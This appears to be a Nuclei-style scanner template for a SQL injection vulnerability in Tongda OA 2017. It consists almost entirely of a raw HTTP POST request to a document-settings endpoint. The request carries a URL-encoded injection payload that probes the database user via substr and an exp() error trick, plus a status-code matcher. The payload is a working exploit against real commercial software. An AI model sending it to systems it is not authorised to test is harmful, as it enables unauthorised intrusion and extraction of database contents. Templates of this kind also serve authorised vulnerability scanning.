id: tongda-sqli

info:
  name: 通达OA2017 sql注入漏洞
  author: Str1am
  severity: high
  tags: tongda,sqli

requests:
  - raw:
      - |
        POST /general/document/index.php/setting/keywords/index HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        _SERVER%5BQUERY_STRING%5D=kname%3D1%27+and%40%60%27%60+or+if%28substr%28user%28%29%2C1%2C1%29%3D%27r%27%2C1%2Cexp%28710%29%29%23

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200